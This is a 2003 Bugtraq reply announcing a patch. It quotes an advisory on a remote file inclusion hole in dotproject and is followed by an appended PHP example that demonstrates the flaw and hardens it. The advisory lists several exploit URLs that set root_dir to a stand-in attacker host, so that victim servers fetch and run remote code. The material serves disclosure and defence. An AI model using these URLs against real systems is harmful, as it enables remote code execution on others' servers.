Re: dotproject Remote Code Execution Vulnerability : Patch

From: Frog Man (leseulfrog@hotmail.com)
Date: 01/29/03

    From: "Frog Man" <leseulfrog@hotmail.com>
    To: bugtraq@securityfocus.com
    Date: Wed, 29 Jan 2003 16:35:49 +0100
    
    

    A non-official patch has been created for this hole and is published on
    http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=d&l=ush
    version) .

    >From: mindwarper@hush.com
    >To: bugtraq@securityfocus.com
    >Subject: dotproject Remote Code Execution Vulnerability
    >Date: Wed, 29 Jan 2003 04:02:24 -0800
    >
    >dotproject Remote Code Execution Vulnerability (By Mindwarper)
    >
    ><------- ------->
    >
    >----------------------
    >Vendor Information:
    >----------------------
    >
    >Homepage : http://www.dotproject.net
    >Vendor : informed
    >Mailed advisory: 28/01/03
    >Vendor Response : None
    >
    >
    >----------------------
    >Affected Versions:
    >----------------------
    >
    >dev20030121
    >
    >
    >----------------------
    >Vulnerability:
    >----------------------
    >
    >
    >dotproject is a PHP+MySQL beta level web based project management and
    >tracking tool that dotmarketing started in Dec. 2000.
    >Inside the directory /modules/ multiple files try to include
    >classdefs/date.php without defining $root_dir first and allow remote
    >attackers to inject their own servers if globals are set on.
    >
    >Example Code from modules/projects/addedit.php:
    >
    >******
    >
    ><?php
    >##
    >## Files modules: index page re-usable sub-table
    >##
    >
    >## $root_dir is never assigned above this line; with register_globals on
    >## it is taken straight from the request (?root_dir=...)
    >require_once( "$root_dir/classdefs/date.php" );
    >$df = $AppUI->getPref('SHDATEFORMAT');
    >$tf = $AppUI->getPref('TIMEFORMAT');
    >
    >******
    >
    >As you can see nothing happens before the require_once function is called
    >and therefore with globals set on an attacker may include remote files.
    >
    >Example:
    >
    >http://victim/dotproject/modules/files/index_table.php?root_dir=http://attacker
    >
    >This also works on
    >
    >http://victim/dotproject/modules/projects/addedit.php?root_dir=http://attacker
    >http://victim/dotproject/modules/projects/view.php?root_dir=http://attacker
    >http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://attacker
    >http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://attacker
    >http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker
    >
    >
    >----------------------
    >Solution:
    >----------------------
    >
    >Please check the vendor's website for new patches.
    >
    >As a temporary solution, create a .htaccess file that contains
    >'Deny from all'. Place it in the /modules/ directory and that should
    >block remote users from accessing it.
    >
    >
    >----------------------
    >Contact:
    >----------------------
    >
    >Name: Mindwarper
    >Email: mindwarper@hush.com
    >Website: http://mindlock.bestweb.net
    >
    >
    ><------- ------->
    >
    >
    >
    >
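The quoted include and one way to harden it, as an added example that is not part of either message above and is not dotProject's own code. It simulates register_globals with extract() on a constructed request, derives the base directory from the file's own location instead of the request, and adds a defence-in-depth check for URL schemes and traversal. The constant name DP_ROOT_DIR and the function names are assumptions made for this example.

```php
<?php
// Added example (not dotProject's code): why the quoted require_once is
// exploitable under register_globals=On, and a hardened replacement.

// Vulnerable pattern, as in the quoted modules/projects/addedit.php.
// register_globals turns ?root_dir=http://attacker into $root_dir before
// any line of the script runs; extract() is used here only to simulate that.
function vulnerable_include_path(array $request)
{
    $root_dir = '';                          // what an unset variable evaluates to
    extract($request, EXTR_OVERWRITE);       // simulated register_globals
    return "$root_dir/classdefs/date.php";   // becomes http://attacker/classdefs/date.php
}

// Hardened pattern: the base directory is derived from the file's own
// location and the request is never consulted. DP_ROOT_DIR is an assumed
// name for this example, not a dotProject constant.
if (!defined('DP_ROOT_DIR')) {
    define('DP_ROOT_DIR', dirname(__FILE__));
}

function hardened_include_path(array $request)
{
    // Even with register_globals on, an explicit assignment overrides the
    // injected value; the request array is ignored entirely.
    $root_dir = DP_ROOT_DIR;
    return $root_dir . '/classdefs/date.php';
}

// Defence in depth for code that must accept a configurable path: refuse
// anything carrying a URL scheme (http:, ftp:, php:, data:) or a traversal
// component. Note this also rejects Windows drive letters such as C:.
function is_local_root_dir($candidate)
{
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $candidate)) {
        return false;
    }
    if (strpos($candidate, '..') !== false) {
        return false;
    }
    return true;
}

// Constructed request mirroring the advisory's example URL.
$request = array('root_dir' => 'http://attacker');

echo "vulnerable: " . vulnerable_include_path($request) . "\n";
echo "hardened:   " . hardened_include_path($request) . "\n";
foreach (array('http://attacker', '../../etc', '/var/www/dotproject') as $c) {
    printf("%-22s %s\n", $c, is_local_root_dir($c) ? 'accepted' : 'rejected');
}
```

The advisory's `Deny from all` in /modules/ is the web-server-layer equivalent of the second function: module files are only ever reached through the application's own entry points. Turning register_globals off removes the injection vector for every file at once, and keeping allow_url_fopen off prevents require_once from fetching code over HTTP even if a variable is still attacker-controlled.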
